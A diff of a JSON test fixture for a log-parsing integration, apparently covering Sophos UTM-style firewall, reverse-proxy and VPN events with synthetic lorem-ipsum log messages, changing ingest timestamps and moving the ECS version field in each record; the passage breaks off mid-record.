"2016:10:26-19:58:50 aua[32]: id=mmo severity=high sys=tlaboru sub=aeabillo name=checking if admin is enabled srcip=10.26.228.145 user=eruntmo caller=nimve engine=usanti", "event": { - "ingested": "2021-12-09T13:44:53.094012800Z" + "ingested": "2021-12-14T14:54:42.826915716Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:11:10-03:01:24 sshd[2051]: Server listening on 10.59.215.207 port 6195.", "event": { - "ingested": "2021-12-09T13:44:53.094016800Z" + "ingested": "2021-12-14T14:54:42.826916092Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:11:24-10:03:59 ectobeat3157.mail.local reverseproxy: [uasiarch] [Malor:low] [pid 170:cillumdo] AH02312: Fatal error initialising mod_ssl, ditau.", "event": { - "ingested": "2021-12-09T13:44:53.094021500Z" + "ingested": "2021-12-14T14:54:42.826916479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:12:8-17:06:33 ident2323.internal.corp reverseproxy: [hend] [remagna:high] [pid 873:aparia] AH01909: 10.144.21.112:90:epteurs server certificate does NOT include an ID which matches the server name", "event": { - "ingested": "2021-12-09T13:44:53.094025500Z" + "ingested": "2021-12-14T14:54:42.826916874Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:12:23-00:09:07 ttenb4581.www.host httpproxy: [rem] main (exer) shutdown finished, exiting", "event": { - "ingested": "2021-12-09T13:44:53.094030600Z" + "ingested": "2021-12-14T14:54:42.826917376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:1:6-07:11:41 lapari5763.api.invalid frox: Listening on 10.103.2.48:4713", "event": { - "ingested": "2021-12-09T13:44:53.094034600Z" + "ingested": "2021-12-14T14:54:42.826917760Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:1:20-14:14:16 elites4713.www.localhost ulogd: id=serr severity=very-high sys=olore sub=onemul name=portscan detected action=deny fwrule=remeum seq=etur initf=lo6086 outitf=lo272 dstmac=01:00:5e:51:b9:4d srcmac=01:00:5e:15:3a:74 srcip=10.161.51.135 dstip=10.52.190.18 proto=isni length=quid tos=aUten prec=Duis ttl=uisq srcport=7807 dstport=165 tcpflags=accus info=CSed code=tiu type=wri", "event": { - "ingested": "2021-12-09T13:44:53.094039400Z" + "ingested": "2021-12-14T14:54:42.826918138Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:2:3-21:16:50 sam1795.invalid reverseproxy: [lorese] [olupta:low] [pid 3338:iqui] AH02312: Fatal error initialising mod_ssl, animide.", "event": { - "ingested": "2021-12-09T13:44:53.094043400Z" + "ingested": "2021-12-14T14:54:42.826918523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:2:18-04:19:24 confd[10]: id=arch severity=high sys=data sub=ugits name=ittenb client=tobeatae facility=ntut user=llum srcip=10.232.108.32 version=1.5240 storage=idolo object=mqu class=mquido type=ende attributes=ntmollitcount=tisu node=ionofdeF account=rsp", "event": { - "ingested": "2021-12-09T13:44:53.094048300Z" + "ingested": "2021-12-14T14:54:42.826918925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:3:4-11:21:59 nostrum6305.internal.localhost astarosg_TVM: id=llitani severity=high sys=itametco sub=etcons name=web request blocked, forbidden url detectedaction=allow method=iuntN client=utfugi facility=ursintoc user=tio srcip=10.89.41.97 dstip=10.231.116.175 version=1.5146 storage=lup ad_domain=mipsamv object=exeacomm class=sequines type=cto attributes=cusacount=nderi node=tem account=tcustatuscode=eumiu cached=nim profile=pteurs filteraction=ercitati size=835 request=ptat url=https://mail.example.net/velillu/ecatcupi.txt?rsitamet=leumiur#ssequamn referer=https://example.com/taliqui/idi.txt?undeomn=ape#itaspe error=ari authtime=umtot dnstime=onemulla cattime=atquo avscantime=borio fullreqtime=equatD device=uidol auth=inculpa ua=ruredol exceptions=iadeseru group=loremagn category=acons categoryname=nimadmi content-type=lapa reputation=emoenimi application=iquipex app-id=mqu reason=onorume filename=abill file=ametcon extension=ofdeFini time=tasnu function=deny line=tionev message=uasiarch fwrule=velites seq=uredolor initf=lo1543 outitf=lo6683 dstmac=01:00:5e:8c:f2:06 srcmac=01:00:5e:6f:71:02 proto=plica length=asiarc tos=lor prec=;nvolupt ttl=dquia srcport=5334 dstport=1525 tcpflags=umfugiat info=quisnos prec=utf caller=dolor engine=dexe localip=nemul host=Duis583.api.local extra=eavolupt server=10.17.51.153 cookie=aperiame set-cookie=stenat", "event": { - "ingested": "2021-12-09T13:44:53.094052300Z" + "ingested": "2021-12-14T14:54:42.826919321Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:3:18-18:24:33 xeaco7887.www.localdomain aua: id=hite severity=very-high sys=ugitsed sub=dminimve name=Packet accepted srcip=10.137.165.144 user=uptate caller=tot engine=reme", "event": { - "ingested": "2021-12-09T13:44:53.094057100Z" + "ingested": "2021-12-14T14:54:42.826919724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:4:2-01:27:07 reverseproxy[5430]: ARGS:userPermissions: [\\\\x22dashletAccessAlertingRecentAlertsPanel\\\\x22,\\\\x22dashletAccessAlerterTopAlertsDashlet\\\\x22,\\\\x22accessViewRules\\\\x22,\\\\x22deployLiveResources\\\\x22,\\\\x22vi...\"] [severity [hostname \"iscivel3512.invalid\"] [uri \"atcupi\"] [unique_id \"eriti\"]", "event": { - "ingested": "2021-12-09T13:44:53.094061200Z" + "ingested": "2021-12-14T14:54:42.826920110Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:4:16-08:29:41 sockd[6181]: dante/server 1.202 running", "event": { - "ingested": "2021-12-09T13:44:53.094068Z" + "ingested": "2021-12-14T14:54:42.826920522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:4:30-15:32:16 dolor5799.home afcd: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-12-09T13:44:53.094072200Z" + "ingested": "2021-12-14T14:54:42.826920911Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:5:14-22:34:50 oreseosq1859.api.lan reverseproxy: [mmodic] [essequam:low] [pid 6691:ficiade] [client uiinea] [uianonn] virus daemon connection problem found in request https://www5.example.com/dantium/ors.htm?sinto=edi#eumiure, referer: https://example.com/adeser/mSe.gif?aute=rchite#rcit", "event": { - "ingested": "2021-12-09T13:44:53.094077Z" + "ingested": "2021-12-14T14:54:42.826921319Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:5:29-05:37:24 confd-sync[6908]: id=smoditem severity=very-high sys=tev sub=oNemoeni name=luptatem", "event": { - "ingested": "2021-12-09T13:44:53.094081100Z" + "ingested": "2021-12-14T14:54:42.826921826Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:6:12-12:39:58 autodit272.www.localhost reverseproxy: [oriss] [imadmin:very-high] [pid 1121:urve] ModSecurity: sBonoru compiled version=\"everi\"; loaded version=\"squ\"", "event": { - "ingested": "2021-12-09T13:44:53.094086Z" + "ingested": "2021-12-14T14:54:42.826922225Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:6:26-19:42:33 rporis6787.www5.localdomain reverseproxy: [quasiarc] [pta:low] [pid 3705:liqu] [client ipsu] AH01114: siarch: failed to make connection to backend: 10.148.21.7", "event": { - "ingested": "2021-12-09T13:44:53.094090300Z" + "ingested": "2021-12-14T14:54:42.826922605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:7:11-02:45:07 reprehe5661.www.lan reverseproxy: rManage\\\\x22,\\\\x22manageLiveSystemSettings\\\\x22,\\\\x22accessViewJobs\\\\x22,\\\\x22exportList\\\\...\"] [ver \"olor\"] [maturity \"corpo\"] [accuracy \"commod\"] iumd [hostname \"ntore4333.api.invalid\"] [uri \"sitv\"] [unique_id \"equam\"]", "event": { - "ingested": "2021-12-09T13:44:53.094095100Z" + "ingested": "2021-12-14T14:54:42.826923001Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:7:25-09:47:41 exim[2384]: aeca-ugitse-ameiu utei:caecat:lumquid oluptat sequatD163.internal.example [10.151.206.38]:5794 lits", "event": { - "ingested": "2021-12-09T13:44:53.094099100Z" + "ingested": "2021-12-14T14:54:42.826923393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:8:8-16:50:15 elillu5777.www5.lan pluto: \"elaudant\"[olup] 10.230.4.70 #ncu: starting keying attempt quaturve of an unlimited number", "event": { - "ingested": "2021-12-09T13:44:53.094103400Z" + "ingested": "2021-12-14T14:54:42.826923783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:8:22-23:52:50 ecatcup3022.mail.invalid xl2tpd: Inherited by nproide", "event": { - "ingested": "2021-12-09T13:44:53.094107400Z" + "ingested": "2021-12-14T14:54:42.826924175Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:9:6-06:55:24 qui7797.www.host ipsec_starter: Starting strongSwan umet IPsec [starter]...", "event": { - "ingested": "2021-12-09T13:44:53.094111100Z" + "ingested": "2021-12-14T14:54:42.826924575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:9:20-13:57:58 nofdeFin2037.mail.example reverseproxy: [quatD] [nevol:high] [pid 3994:Sectio] [client tiumdol] [laud] cannot read reply: Operation now in progress (115), referer: https://example.org/tquov/natu.jpg?uianonnu=por#nve", "event": { - "ingested": "2021-12-09T13:44:53.094115Z" + "ingested": "2021-12-14T14:54:42.826924962Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:10:4-21:00:32 sockd[7264]: dante/server 1.3714 running", "event": { - "ingested": "2021-12-09T13:44:53.094119800Z" + "ingested": "2021-12-14T14:54:42.826925359Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:10:19-04:03:07 eFinib2403.api.example reverseproxy: [utaliq] [sun:high] [pid 4074:uredol] [client quatD] [enimad] ecatcu while reading reply from cssd, referer: https://mail.example.org/urautod/eveli.html?rese=nonproi#doconse", "event": { - "ingested": "2021-12-09T13:44:53.094123900Z" + "ingested": "2021-12-14T14:54:42.826925750Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:11:2-11:05:41 confd[4939]: id=acons severity=high sys=adipisc sub=omnisist name=orroqui client=sci facility=psamvolu user=itsedqui srcip=10.244.96.61 version=1.2707 storage=onevol object=ese class=reprehen type=Exce attributes=toccacount=tinvolu node=ecatc account=iumt", "event": { - "ingested": "2021-12-09T13:44:53.094128900Z" + "ingested": "2021-12-14T14:54:42.826959255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:11:16-18:08:15 named[1900]: reloading eddoei iono", "event": { - "ingested": "2021-12-09T13:44:53.094132900Z" + "ingested": "2021-12-14T14:54:42.826960967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:12:1-01:10:49 obeatae2042.www.domain reverseproxy: [dquian] [isaute:low] [pid 1853:utfugit] (70007)The ula specified has expired: [client quaUteni] AH01110: error reading response", "event": { - "ingested": "2021-12-09T13:44:53.094137900Z" + "ingested": "2021-12-14T14:54:42.826961381Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:12:15-08:13:24 aerat1267.www5.example pop3proxy: Master started", "event": { - "ingested": "2021-12-09T13:44:53.094143600Z" + "ingested": "2021-12-14T14:54:42.826961774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:12:29-15:15:58 writt2238.internal.localdomain reverseproxy: [uaer] [aed:low] [pid 478:ain] [client scingeli] [uatDuis] mod_avscan_check_file_single_part() called with parameter filename=imip", "event": { - "ingested": "2021-12-09T13:44:53.094149200Z" + "ingested": "2021-12-14T14:54:42.826962176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:1:12-22:18:32 siutaliq4937.api.lan reverseproxy: [siutaliq] [urvel:very-high] [pid 7721:ntium] [imadmi] Hostname in dquiac request (liquide) does not match the server name (uatD)", "event": { - "ingested": "2021-12-09T13:44:53.094154300Z" + "ingested": "2021-12-14T14:54:42.826962889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:1:27-05:21:06 URID[7596]: T=BCSedut ------ 1 - [exit] accept: ametco", "event": { - "ingested": "2021-12-09T13:44:53.094160100Z" + "ingested": "2021-12-14T14:54:42.826964765Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:2:10-12:23:41 astarosg_TVM[1090]: id=udex severity=low sys=iam sub=animi name=UDP flood detectedaction=allow method=nsectetu client=spici facility=untutl user=hen srcip=10.214.167.164 dstip=10.76.98.53 version=1.3726 storage=uovolup ad_domain=expl object=animi class=mdoloree type=mullamco attributes=tnulcount=ons node=radip account=amremapstatuscode=dolorsit cached=atisund profile=isnostru filteraction=quepo size=5693 request=nisi url=https://api.example.org/iono/secillum.txt?apariat=tse#enbyCi referer=https://example.com/eetdol/aut.jpg?pitlab=tutlabor#imadmi error=nculp authtime=quamnihi dnstime=nimadmi cattime=mquiado avscantime=agn fullreqtime=dip device=urmag auth=nim ua=laboreet exceptions=tutlabo group=incid category=der categoryname=totamrem content-type=eaqu reputation=itani application=mni app-id=runtmol reason=uaer filename=nor file=saut extension=olest time=volu function=block line=osam message=ncid fwrule=loremagn seq=uisau initf=lo1255 outitf=eth965 dstmac=01:00:5e:2f:c3:3e srcmac=01:00:5e:65:2d:fe proto=ictasun length=iumto tos=ciun prec=;prehe ttl=essec srcport=4562 dstport=2390 tcpflags=uaera info=nsequa prec=yCicero caller=orporis engine=oluptate localip=tesseq host=tenbyCi4371.www5.localdomain extra=spernatu server=10.98.126.206 cookie=tion set-cookie=tNeque", "event": { - "ingested": "2021-12-09T13:44:53.094165800Z" + "ingested": "2021-12-14T14:54:42.826965214Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:2:24-19:26:15 ulogd[6722]: id=persp severity=medium sys=orev sub=lapa name=Packet logged action=allow fwrule=adminim seq=isiutali initf=lo7088 outitf=eth6357 dstmac=01:00:5e:9a:fe:91 srcmac=01:00:5e:78:1a:5a srcip=10.203.157.250 dstip=10.32.236.117 proto=turm length=quamei tos=nvento prec=nama ttl=ema srcport=6585 dstport=5550 tcpflags=xeacomm info=oriosa code=erspici type=oreeu", "event": { - "ingested": "2021-12-09T13:44:53.094171700Z" + "ingested": "2021-12-14T14:54:42.826965610Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:3:11-02:28:49 ectob5542.www5.corp reverseproxy: [agni] [ivelit:high] [pid 7755:uovol] AH00959: ap_proxy_connect_backend disabling worker for (10.231.77.26) for volups", "event": { - "ingested": "2021-12-09T13:44:53.094177400Z" + "ingested": "2021-12-14T14:54:42.826966012Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:3:25-09:31:24 iusmo901.www.home httpd: id=scivelit severity=high sys=untut sub=siu name=Authentication successfulaction=allow method=icons client=hende facility=umdol user=Sedutper srcip=10.2.24.156 dstip=10.113.78.101 version=1.2707 storage=amqua ad_domain=nsequatu object=aboNemoe class=mqu type=tse attributes=ntiumdcount=ueip node=amvo account=dolorsistatuscode=acc cached=quinesc profile=ulpaq filteraction=usa size=5474 request=tob url=https://www.example.org/imipsamv/doeiu.jpg?nderit=ficia#tru referer=https://mail.example.org/natuser/olupt.txt?ipsumqu=nsec#smo error=avolup authtime=litse dnstime=archit cattime=nde avscantime=tNequepo fullreqtime=byCicer device=imvenia auth=ipit ua=tdolorem exceptions=nderitin group=mquiado category=ssequa categoryname=nisist content-type=temvele reputation=ofd application=quam app-id=umdol reason=porincid filename=tisetqu file=pici extension=erit time=ehenderi function=block line=fugiatqu message=Duisaute fwrule=uptat seq=hende initf=lo3680 outitf=lo4358 dstmac=01:00:5e:0a:8f:6c srcmac=01:00:5e:34:8c:d2 proto=mnis length=ainci tos=aturve prec=;tiumdol ttl=mporain srcport=6938 dstport=6939 tcpflags=dut info=aecons prec=tionemu caller=edictasu engine=quipexea localip=orsit host=tenima5715.api.example extra=snisiut server=10.92.93.236 cookie=amr set-cookie=mfug port=7174 query=exerc uid=ntoccae", "event": { - "ingested": "2021-12-09T13:44:53.094183200Z" + "ingested": "2021-12-14T14:54:42.826966403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:4:8-16:33:58 astarosg_TVM[6463]: id=user severity=low sys=sequamn sub=adeseru name=File extension warned and proceededaction=accept method=mquisn client=ulamcol facility=nulamcol user=atatno srcip=10.180.169.49 dstip=10.206.69.71 version=1.3155 storage=risni ad_domain=ccaecat object=dtemp class=onproid type=ica attributes=mnisiscount=edolor node=nonnumqu account=iscivelistatuscode=urve cached=sundeomn profile=tasu filteraction=equunt size=3144 request=ilmo url=https://mail.example.net/isqua/deF.html?iameaq=orainci#adm referer=https://api.example.org/mremap/ate.htm?tlabor=cidunt#ria error=tessec authtime=cupida dnstime=ciade cattime=busBonor avscantime=enima fullreqtime=emseq device=osamni auth=umetMa ua=equatDui exceptions=its group=setquas category=nti categoryname=osamnis content-type=atisetqu reputation=ciduntut application=atisu app-id=edutpe reason=architec filename=incul file=tevelit extension=emse time=eipsaqua function=cancel line=suntincu message=lore fwrule=equatu seq=enbyCi initf=enp0s566 outitf=lo2179 dstmac=01:00:5e:2c:9d:65 srcmac=01:00:5e:1a:03:f5 proto=orema length=iusmo tos=uunturm prec=;mSect ttl=avolupta srcport=3308 dstport=1402 tcpflags=dolo info=tsed prec=corpori caller=cillumd engine=umdol localip=turmagn host=mni4032.lan extra=amrem server=10.202.65.2 cookie=queporr set-cookie=oide", "event": { - "ingested": "2021-12-09T13:44:53.094188900Z" + "ingested": "2021-12-14T14:54:42.826966798Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:4:22-23:36:32 iscing6960.api.invalid reverseproxy: [emipsu] [incidu:very-high] [pid 5350:itation] SSL Library Error: error:itasper:failure", "event": { - "ingested": "2021-12-09T13:44:53.094194500Z" + "ingested": "2021-12-14T14:54:42.826967182Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:5:7-06:39:06 httpd[793]: [ruredo:success] [pid nculpaq:mides] [client iconseq] ModSecurity: Warning. nidolo [file \"runtmoll\"] [line \"tuserror\"] [id \"utlabo\"] [rev \"scip\"] [msg \"imvenia\"] [severity \"low\"] [ver \"1.6420\"] [maturity \"nisi\"] [accuracy \"seq\"] [tag \"ors\"] [hostname \"olupta3647.host\"] [uri \"uaUteni\"] [unique_id \"gitsedqu\"]amqu", "event": { - "ingested": "2021-12-09T13:44:53.094200300Z" + "ingested": "2021-12-14T14:54:42.826967565Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:5:21-13:41:41 named[6633]: FORMERR resolving 'iavolu7814.www5.localhost': 10.194.12.83#elit", "event": { - "ingested": "2021-12-09T13:44:53.094206Z" + "ingested": "2021-12-14T14:54:42.826967951Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:6:4-20:44:15 astarosg_TVM[5792]: id=elitess severity=low sys=amqua sub=mavenia name=checking if admin is enabledaction=cancel method=doc client=teurs facility=eturadi user=eturadip srcip=10.33.138.154 dstip=10.254.28.41 version=1.4256 storage=volupta ad_domain=dolor object=dolorsit class=tfugits type=lor attributes=oremcount=utper node=ueips account=umqustatuscode=ntexpli cached=siuta profile=porincid filteraction=itame size=1026 request=fugiat url=https://www5.example.org/etcons/aecatc.jpg?ditem=tut#oditautf referer=https://internal.example.org/eddoei/iatqu.htm?itessec=dat#tdol error=emul authtime=ariatu dnstime=luptate cattime=umdolore avscantime=iutaliq fullreqtime=oriosamn device=oluptate auth=tcu ua=mmodo exceptions=rauto group=lup category=orem categoryname=tutl content-type=iusmo reputation=uiavolu application=eri app-id=pis reason=riosam filename=isa file=nonnum extension=Nemoenim time=itati function=cancel line=nes message=atvolupt fwrule=umwritt seq=uae initf=enp0s3792 outitf=lo2114 dstmac=01:00:5e:24:b8:9f srcmac=01:00:5e:a1:a3:9f proto=bil length=itten tos=icer prec=;dolo ttl=siutaliq srcport=1455 dstport=6937 tcpflags=pexeaco info=ercitati prec=dexea caller=tasnul engine=onu localip=orisnisi host=obea2960.mail.corp extra=dolor server=10.45.12.53 cookie=etdo set-cookie=edictas", "event": { - "ingested": "2021-12-09T13:44:53.094211800Z" + "ingested": "2021-12-14T14:54:42.826968353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:6:19-03:46:49 frox[7744]: Listening on 10.99.134.49:2274", "event": { - "ingested": "2021-12-09T13:44:53.094217Z" + "ingested": "2021-12-14T14:54:42.826968746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:7:3-10:49:23 olli5982.www.test reverseproxy: [asp] [uatDui:medium] [pid 212:unde] [client raut] [suscip] virus daemon error found in request ectetu, referer: https://example.com/ariat/ptatemU.txt?cusan=ueipsaq#upid", "event": { - "ingested": "2021-12-09T13:44:53.094221900Z" + "ingested": "2021-12-14T14:54:42.826969131Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:7:17-17:51:58 nsecte3644.internal.test reverseproxy: [tutla] [isund:high] [pid 3136:uidex] [client uptate] Invalid signature, cookie: JSESSIONID", "event": { - "ingested": "2021-12-09T13:44:53.094227600Z" + "ingested": "2021-12-14T14:54:42.826969522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:8:1-00:54:32 confd[4157]: id=onseq severity=very-high sys=siutaliq sub=aliqu name=serro client=ctet facility=umiurere user=antium srcip=10.32.85.21 version=1.7852 storage=eaco object=onp class=ectetur type=ione attributes=utlaborecount=nci node=acommodi account=etconsec", "event": { - "ingested": "2021-12-09T13:44:53.094233400Z" + "ingested": "2021-12-14T14:54:42.826969920Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:8:15-07:57:06 econseq7119.www.home sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-12-09T13:44:53.094237700Z" + "ingested": "2021-12-14T14:54:42.826970322Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:8:29-14:59:40 ant2543.www5.lan reverseproxy: [uaturve] [lapa:high] [pid 3669:idu] [client sed] [utem] cannot read reply: Operation now in progress (115), referer: https://example.com/oremagn/ehenderi.htm?mdolo=ionul#oeiusmo", "event": { - "ingested": "2021-12-09T13:44:53.094242400Z" + "ingested": "2021-12-14T14:54:42.826970725Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:9:12-22:02:15 pluto[7138]: | sent accept notification olore with seqno = urEx", "event": { - "ingested": "2021-12-09T13:44:53.094248100Z" + "ingested": "2021-12-14T14:54:42.826971114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:9:27-05:04:49 httpd[6562]: id=iurere severity=medium sys=erc sub=atu name=http accessaction=accept method=odte client=uis facility=sedquia user=reetd srcip=10.210.175.52 dstip=10.87.14.186 version=1.7641 storage=tasu ad_domain=mquae object=CSedu class=atae type=aeconseq attributes=boNemocount=duntutla node=mqu account=inimastatuscode=emipsum cached=venia profile=Loremi filteraction=uisnostr size=849 request=vol url=https://internal.example.com/ritat/dipi.jpg?aliquide=aliqui#agnaaliq referer=https://api.example.org/Bonorume/emeumfu.txt?iuntNequ=ender#quid error=mipsa authtime=teturad dnstime=nimide cattime=spernat avscantime=nevolu fullreqtime=itectobe device=rroq auth=itessequ ua=uunt exceptions=pic group=unt category=emUt categoryname=eiru content-type=sauteir reputation=pic application=caecatc app-id=iarc reason=emquia filename=duntutl file=idi extension=reetdo time=pidatatn function=cancel line=ncul message=mcorpor fwrule=ofd seq=lapariat initf=eth65 outitf=lo3615 dstmac=01:00:5e:b3:e3:90 srcmac=01:00:5e:0e:b3:8e proto=consequ length=min tos=riame prec=;gnaal ttl=nti srcport=1125 dstport=605 tcpflags=utlab info=colabo prec=ditem caller=did engine=BCS localip=idex host=nisiuta4810.api.test extra=apa server=10.85.200.58 cookie=esse set-cookie=idexeac port=2294 query=iatquovo uid=rExce", "event": { - "ingested": "2021-12-09T13:44:53.094253200Z" + "ingested": "2021-12-14T14:54:42.826971509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:10:11-12:07:23 itametc1599.api.test ulogd: id=itaedi severity=low sys=ore sub=ips name=Authentication successful action=block fwrule=iamqu seq=aboN initf=eth2679 outitf=enp0s1164 dstmac=01:00:5e:c3:8a:24 srcmac=01:00:5e:5a:9d:a9 srcip=10.133.45.45 dstip=10.115.166.48 proto=utaliq length=icer tos=essequ prec=oeiu ttl=nsequa srcport=4180 dstport=4884 tcpflags=squa info=etM code=eve type=iru", "event": { - "ingested": "2021-12-09T13:44:53.094257300Z" + "ingested": "2021-12-14T14:54:42.826971902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:10:25-19:09:57 tiumt5462.mail.localhost sshd: Invalid user admin from runt", "event": { - "ingested": "2021-12-09T13:44:53.094261800Z" + "ingested": "2021-12-14T14:54:42.826972285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:11:9-02:12:32 vol1450.internal.host sshd: Server listening on 10.71.184.162 port 3506.", "event": { - "ingested": "2021-12-09T13:44:53.094266500Z" + "ingested": "2021-12-14T14:54:42.826972671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:11:23-09:15:06 ipsec_starter[178]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-12-09T13:44:53.094271400Z" + "ingested": "2021-12-14T14:54:42.826973055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:12:7-16:17:40 rporissu573.api.test reverseproxy: [exercita] [emaperi:very-high] [pid 